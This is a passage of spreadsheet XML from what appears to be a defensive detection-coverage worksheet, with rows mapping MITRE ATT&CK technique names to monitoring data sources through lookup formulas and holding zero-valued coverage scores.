        <f>LOOKUP(A55,'REF-DataSources'!A:B)</f>
        <v>Systemd Timers</v>
      </c>
      <c r="C55" s="45"/>
      <c r="D55" s="45"/>
      <c r="E55" s="45"/>
      <c r="F55" s="14">
        <v>0</v>
      </c>
      <c r="G55" s="14">
        <v>0</v>
      </c>
      <c r="H55" s="14">
        <v>0</v>
      </c>
      <c r="I55" s="32">
        <f t="shared" ref="I55:I83" si="2">((F55*2)+G55+(H55*2))/5</f>
        <v>0</v>
      </c>
      <c r="K55" s="46" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="56" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A56" s="43" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="41" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:B)</f>
        <v>Process Injection</v>
      </c>
      <c r="C56" s="45"/>
      <c r="D56" s="45"/>
      <c r="E56" s="45"/>
      <c r="F56" s="14">
        <v>0</v>
      </c>
      <c r="G56" s="14">
        <v>0</v>
      </c>
      <c r="H56" s="14">
        <v>0</v>
      </c>
      <c r="I56" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K56" s="46" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
    </row>
    <row r="57" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A57" s="43" t="s">
        <v>133</v>
      </c>
      <c r="B57" s="41" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:B)</f>
        <v>Input Capture</v>
      </c>
      <c r="C57" s="45"/>
      <c r="D57" s="45"/>
      <c r="E57" s="45"/>
      <c r="F57" s="14">
        <v>0</v>
      </c>
      <c r="G57" s="14">
        <v>0</v>
      </c>
      <c r="H57" s="14">
        <v>0</v>
      </c>
      <c r="I57" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K57" s="46" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,User interface,Process command-line parameters,Process monitoring,PowerShell logs,Loaded DLLs,Kernel drivers,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
    </row>
    <row r="58" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A58" s="43" t="s">
        <v>135</v>
      </c>
      <c r="B58" s="41" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
      <c r="C58" s="45"/>
      <c r="D58" s="45"/>
      <c r="E58" s="45"/>
      <c r="F58" s="14">
        <v>0</v>
      </c>
      <c r="G58" s="14">
        <v>0</v>
      </c>
      <c r="H58" s="14">
        <v>0</v>
      </c>
      <c r="I58" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K58" s="46" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="59" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A59" s="43" t="s">
        <v>136</v>
      </c>
      <c r="B59" s="41" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
      <c r="C59" s="45"/>
      <c r="D59" s="45"/>
      <c r="E59" s="45"/>
      <c r="F59" s="14">
        <v>0</v>
      </c>
      <c r="G59" s="14">
        <v>0</v>
      </c>
      <c r="H59" s="14">
        <v>0</v>
      </c>
      <c r="I59" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K59" s="46" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="60" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A60" s="43" t="s">
        <v>138</v>
      </c>
      <c r="B60" s="41" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:B)</f>
        <v>Command and Scripting Interpreter</v>
      </c>
      <c r="C60" s="45"/>
      <c r="D60" s="45"/>
      <c r="E60" s="45"/>
      <c r="F60" s="14">
        <v>0</v>
      </c>
      <c r="G60" s="14">
        <v>0</v>
      </c>
      <c r="H60" s="14">
        <v>0</v>
      </c>
      <c r="I60" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K60" s="46" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,PowerShell logs,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="61" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A61" s="43" t="s">
        <v>139</v>
      </c>
      <c r="B61" s="41" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:B)</f>
        <v>Network Device CLI</v>
      </c>
      <c r="C61" s="45"/>
      <c r="D61" s="45"/>
      <c r="E61" s="45"/>
      <c r="F61" s="14">
        <v>0</v>
      </c>
      <c r="G61" s="14">
        <v>0</v>
      </c>
      <c r="H61" s="14">
        <v>0</v>
      </c>
      <c r="I61" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K61" s="46" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network device run-time memory,Network device command history,Network device configuration</v>
      </c>
    </row>
    <row r="62" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A62" s="43" t="s">
        <v>141</v>
      </c>
      <c r="B62" s="41" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:B)</f>
        <v>Graphical User Interface</v>
      </c>
      <c r="C62" s="45"/>
      <c r="D62" s="45"/>
      <c r="E62" s="45"/>
      <c r="F62" s="14">
        <v>0</v>
      </c>
      <c r="G62" s="14">
        <v>0</v>
      </c>
      <c r="H62" s="14">
        <v>0</v>
      </c>
      <c r="I62" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K62" s="46" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
    </row>
    <row r="63" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A63" s="43" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="41" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
      <c r="C63" s="45"/>
      <c r="D63" s="45"/>
      <c r="E63" s="45"/>
      <c r="F63" s="14">
        <v>0</v>
      </c>
      <c r="G63" s="14">
        <v>0</v>
      </c>
      <c r="H63" s="14">
        <v>0</v>
      </c>
      <c r="I63" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K63" s="46" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
    </row>
    <row r="64" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A64" s="43" t="s">
        <v>143</v>
      </c>
      <c r="B64" s="41" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
      <c r="C64" s="45"/>
      <c r="D64" s="45"/>
      <c r="E64" s="45"/>
      <c r="F64" s="14">
        <v>0</v>
      </c>
      <c r="G64" s="14">
        <v>0</v>
      </c>
      <c r="H64" s="14">
        <v>0</v>
      </c>
      <c r="I64" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K64" s="46" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
    </row>
    <row r="65" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A65" s="43" t="s">
        <v>145</v>
      </c>
      <c r="B65" s="41" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C65" s="45"/>
      <c r="D65" s="45"/>
      <c r="E65" s="45"/>
      <c r="F65" s="14">
        <v>0</v>
      </c>
      <c r="G65" s="14">
        <v>0</v>
      </c>
      <c r="H65" s="14">
        <v>0</v>
      </c>
      <c r="I65" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K65" s="46" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="66" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A66" s="43" t="s">
        <v>147</v>
      </c>
      <c r="B66" s="41" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C66" s="45"/>
      <c r="D66" s="45"/>
      <c r="E66" s="45"/>
      <c r="F66" s="14">
        <v>0</v>
      </c>
      <c r="G66" s="14">
        <v>0</v>
      </c>
      <c r="H66" s="14">
        <v>0</v>
      </c>
      <c r="I66" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K66" s="46" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="67" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A67" s="43" t="s">
        <v>148</v>
      </c>
      <c r="B67" s="41" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C67" s="45"/>
      <c r="D67" s="45"/>
      <c r="E67" s="45"/>
      <c r="F67" s="14">
        <v>0</v>
      </c>
      <c r="G67" s="14">
        <v>0</v>
      </c>
      <c r="H67" s="14">
        <v>0</v>
      </c>
      <c r="I67" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K67" s="46" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="68" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A68" s="43" t="s">
        <v>149</v>
      </c>
      <c r="B68" s="41" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C68" s="45"/>
      <c r="D68" s="45"/>
      <c r="E68" s="45"/>
      <c r="F68" s="14">
        <v>0</v>
      </c>
      <c r="G68" s="14">
        <v>0</v>
      </c>
      <c r="H68" s="14">
        <v>0</v>
      </c>
      <c r="I68" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K68" s="46" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="69" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A69" s="43" t="s">
        <v>151</v>
      </c>
      <c r="B69" s="41" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Privilege Escalation</v>
      </c>
      <c r="C69" s="45"/>
      <c r="D69" s="45"/>
      <c r="E69" s="45"/>
      <c r="F69" s="14">
        <v>0</v>
      </c>
      <c r="G69" s="14">
        <v>0</v>
      </c>
      <c r="H69" s="14">
        <v>0</v>
      </c>
      <c r="I69" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K69" s="46" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
    </row>
    <row r="70" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A70" s="43" t="s">
        <v>153</v>
      </c>
      <c r="B70" s="41" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:B)</f>
        <v>Permission Groups Discovery</v>
      </c>
      <c r="C70" s="45"/>
      <c r="D70" s="45"/>
      <c r="E70" s="45"/>
      <c r="F70" s="14">
        <v>0</v>
      </c>
      <c r="G70" s="14">
        <v>0</v>
      </c>
      <c r="H70" s="14">
        <v>0</v>
      </c>
      <c r="I70" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K70" s="46" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="71" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A71" s="43" t="s">
        <v>154</v>
      </c>
      <c r="B71" s="41" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal on Host</v>
      </c>
      <c r="C71" s="45"/>
      <c r="D71" s="45"/>
      <c r="E71" s="45"/>
      <c r="F71" s="14">
        <v>0</v>
      </c>
      <c r="G71" s="14">
        <v>0</v>
      </c>
      <c r="H71" s="14">
        <v>0</v>
      </c>
      <c r="I71" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K71" s="46" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
    </row>
    <row r="72" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A72" s="43" t="s">
        <v>155</v>
      </c>
      <c r="B72" s="41" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:B)</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="C72" s="45"/>
      <c r="D72" s="45"/>
      <c r="E72" s="45"/>
      <c r="F72" s="14">
        <v>0</v>
      </c>
      <c r="G72" s="14">
        <v>0</v>
      </c>
      <c r="H72" s="14">
        <v>0</v>
      </c>
      <c r="I72" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K72" s="46" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>DNS records,Network protocol analysis,Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="73" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A73" s="43" t="s">
        <v>157</v>
      </c>
      <c r="B73" s="41" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:B)</f>
        <v>Software Deployment Tools</v>
      </c>
      <c r="C73" s="45"/>
      <c r="D73" s="45"/>
      <c r="E73" s="45"/>
      <c r="F73" s="14">
        <v>0</v>
      </c>
      <c r="G73" s="14">
        <v>0</v>
      </c>
      <c r="H73" s="14">
        <v>0</v>
      </c>
      <c r="I73" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K73" s="46" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
    </row>
    <row r="74" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A74" s="43" t="s">
        <v>159</v>
      </c>
      <c r="B74" s="41" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:B)</f>
        <v>Software Deployment Tools</v>
      </c>
      <c r="C74" s="45"/>
      <c r="D74" s="45"/>
      <c r="E74" s="45"/>
      <c r="F74" s="14">
        <v>0</v>
      </c>
      <c r="G74" s="14">
        <v>0</v>
      </c>
      <c r="H74" s="14">
        <v>0</v>
      </c>
      <c r="I74" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K74" s="46" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
    </row>
    <row r="75" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A75" s="43" t="s">
        <v>160</v>
      </c>
      <c r="B75" s="41" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:B)</f>
        <v>Data Staged</v>
      </c>
      <c r="C75" s="45"/>
      <c r="D75" s="45"/>
      <c r="E75" s="45"/>
      <c r="F75" s="14">
        <v>0</v>
      </c>
      <c r="G75" s="14">
        <v>0</v>
      </c>
      <c r="H75" s="14">
        <v>0</v>
      </c>
      <c r="I75" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K75" s="46" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="76" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A76" s="43" t="s">
        <v>161</v>
      </c>
      <c r="B76" s="41" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C76" s="45"/>
      <c r="D76" s="45"/>
      <c r="E76" s="45"/>
      <c r="F76" s="14">
        <v>0</v>
      </c>
      <c r="G76" s="14">
        <v>0</v>
      </c>
      <c r="H76" s="14">
        <v>0</v>
      </c>
      <c r="I76" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K76" s="46" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="77" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A77" s="43" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="41" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C77" s="45"/>
      <c r="D77" s="45"/>
      <c r="E77" s="45"/>
      <c r="F77" s="14">
        <v>0</v>
      </c>
      <c r="G77" s="14">
        <v>0</v>
      </c>
      <c r="H77" s="14">
        <v>0</v>
      </c>
      <c r="I77" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K77" s="46" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="78" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A78" s="43" t="s">
        <v>163</v>
      </c>
      <c r="B78" s="41" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C78" s="45"/>
      <c r="D78" s="45"/>
      <c r="E78" s="45"/>
      <c r="F78" s="14">
        <v>0</v>
      </c>
      <c r="G78" s="14">
        <v>0</v>
      </c>
      <c r="H78" s="14">
        <v>0</v>
      </c>
      <c r="I78" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K78" s="46" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="79" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A79" s="43" t="s">
        <v>165</v>
      </c>
      <c r="B79" s="41" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:B)</f>
        <v>Valid Accounts</v>
      </c>
      <c r="C79" s="45"/>
      <c r="D79" s="45"/>
      <c r="E79" s="45"/>
      <c r="F79" s="14">
        <v>0</v>
      </c>
      <c r="G79" s="14">
        <v>0</v>
      </c>
      <c r="H79" s="14">
        <v>0</v>
      </c>
      <c r="I79" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K79" s="46" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
    </row>
    <row r="80" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A80" s="43" t="s">
        <v>167</v>
      </c>
      <c r="B80" s="41" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:B)</f>
        <v>Cloud Accounts</v>
      </c>
      <c r="C80" s="45"/>
      <c r="D80" s="45"/>
      <c r="E80" s="45"/>
      <c r="F80" s="14">
        <v>0</v>
      </c>
      <c r="G80" s="14">
        <v>0</v>
      </c>
      <c r="H80" s="14">
        <v>0</v>
      </c>
      <c r="I80" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K80" s="46" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Authentication logs,AWS CloudTrail logs,Stackdriver logs</v>
      </c>
    </row>
    <row r="81" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A81" s="43" t="s">
        <v>169</v>
      </c>
      <c r="B81" s="41" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
      <c r="C81" s="45"/>
      <c r="D81" s="45"/>
      <c r="E81" s="45"/>
      <c r="F81" s="14">
        <v>0</v>
      </c>
      <c r="G81" s="14">
        <v>0</v>
      </c>
      <c r="H81" s="14">
        <v>0</v>
      </c>
      <c r="I81" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K81" s="46" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="82" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A82" s="43" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="41" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
      <c r="C82" s="45"/>
      <c r="D82" s="45"/>
      <c r="E82" s="45"/>
      <c r="F82" s="14">
        <v>0</v>
      </c>
      <c r="G82" s="14">
        <v>0</v>
      </c>
      <c r="H82" s="14">
        <v>0</v>
      </c>
      <c r="I82" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K82" s="46" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="83" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A83" s="43" t="s">
        <v>171</v>
      </c>
      <c r="B83" s="41" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:B)</f>
        <v>System Information Discovery</v>
      </c>
      <c r="C83" s="45"/>
      <c r="D83" s="45"/>
      <c r="E83" s="45"/>
      <c r="F83" s="14">
        <v>0</v>
      </c>
      <c r="G83" s="14">
        <v>0</v>
      </c>
      <c r="H83" s="14">
        <v>0</v>
      </c>
      <c r="I83" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K83" s="46" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="84" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A84" s="43" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="41" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C84" s="45"/>
      <c r="D84" s="45"/>
      <c r="E84" s="45"/>
      <c r="F84" s="14">
        <v>0</v>
      </c>
      <c r="G84" s="14">
        <v>0</v>
      </c>
      <c r="H84" s="14">
        <v>0</v>
      </c>
      <c r="I84" s="32">
        <f t="shared" ref="I84:I147" si="3">((F84*2)+G84+(H84*2))/5</f>
        <v>0</v>
      </c>
      <c r="K84" s="46" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="85" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A85" s="43" t="s">
        <v>173</v>
      </c>
      <c r="B85" s="41" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C85" s="45"/>
      <c r="D85" s="45"/>
      <c r="E85" s="45"/>
      <c r="F85" s="14">
        <v>0</v>
      </c>
      <c r="G85" s="14">
        <v>0</v>
      </c>
      <c r="H85" s="14">
        <v>0</v>
      </c>
      <c r="I85" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K85" s="46" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="86" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A86" s="43" t="s">
        <v>174</v>
      </c>
      <c r="B86" s="41" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C86" s="45"/>
      <c r="D86" s="45"/>
      <c r="E86" s="45"/>
      <c r="F86" s="14">
        <v>0</v>
      </c>
      <c r="G86" s="14">
        <v>0</v>
      </c>
      <c r="H86" s="14">
        <v>0</v>
      </c>
      <c r="I86" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K86" s="46" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="87" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A87" s="43" t="s">
        <v>176</v>
      </c>
      <c r="B87" s="41" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C87" s="45"/>
      <c r="D87" s="45"/>
      <c r="E87" s="45"/>
      <c r="F87" s="14">
        <v>0</v>
      </c>
      <c r="G87" s="14">
        <v>0</v>
      </c>
      <c r="H87" s="14">
        <v>0</v>
      </c>
      <c r="I87" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K87" s="46" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="88" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A88" s="43" t="s">
        <v>178</v>
      </c>
      <c r="B88" s="41" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:B)</f>
        <v>Account Discovery</v>
      </c>
      <c r="C88" s="45"/>
      <c r="D88" s="45"/>
      <c r="E88" s="45"/>
      <c r="F88" s="14">
        <v>0</v>
      </c>
      <c r="G88" s="14">
        <v>0</v>
      </c>
      <c r="H88" s="14">
        <v>0</v>
      </c>
      <c r="I88" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K88" s="46" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="89" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A89" s="43" t="s">
        <v>179</v>
      </c>
      <c r="B89" s="41" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:B)</f>
        <v>Cloud Account</v>
      </c>
      <c r="C89" s="45"/>
      <c r="D89" s="45"/>
      <c r="E89" s="45"/>
      <c r="F89" s="14">
        <v>0</v>
      </c>
      <c r="G89" s="14">
        <v>0</v>
      </c>
      <c r="H89" s="14">
        <v>0</v>
      </c>
      <c r="I89" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K89" s="46" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="90" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A90" s="43" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="41" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:B)</f>
        <v>Cloud Account</v>
      </c>
      <c r="C90" s="45"/>
      <c r="D90" s="45"/>
      <c r="E90" s="45"/>
      <c r="F90" s="14">
        <v>0</v>
      </c>
      <c r="G90" s="14">
        <v>0</v>
      </c>
      <c r="H90" s="14">
        <v>0</v>
      </c>
      <c r="I90" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K90" s="46" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="91" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A91" s="43" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="41" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:B)</f>
        <v>Proxy</v>
      </c>
      <c r="C91" s="45"/>
      <c r="D91" s="45"/>
      <c r="E91" s="45"/>
      <c r="F91" s="14">
        <v>0</v>
      </c>
      <c r="G91" s="14">
        <v>0</v>
      </c>
      <c r="H91" s="14">
        <v>0</v>
      </c>
      <c r="I91" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K91" s="46" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
    </row>
    <row r="92" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A92" s="43" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="41" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:B)</f>
        <v>Replication Through Removable Media</v>
      </c>
      <c r="C92" s="45"/>
      <c r="D92" s="45"/>
      <c r="E92" s="45"/>
      <c r="F92" s="14">
        <v>0</v>
      </c>
      <c r="G92" s="14">
        <v>0</v>
      </c>
      <c r="H92" s="14">
        <v>0</v>
      </c>
      <c r="I92" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K92" s="46" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
    </row>
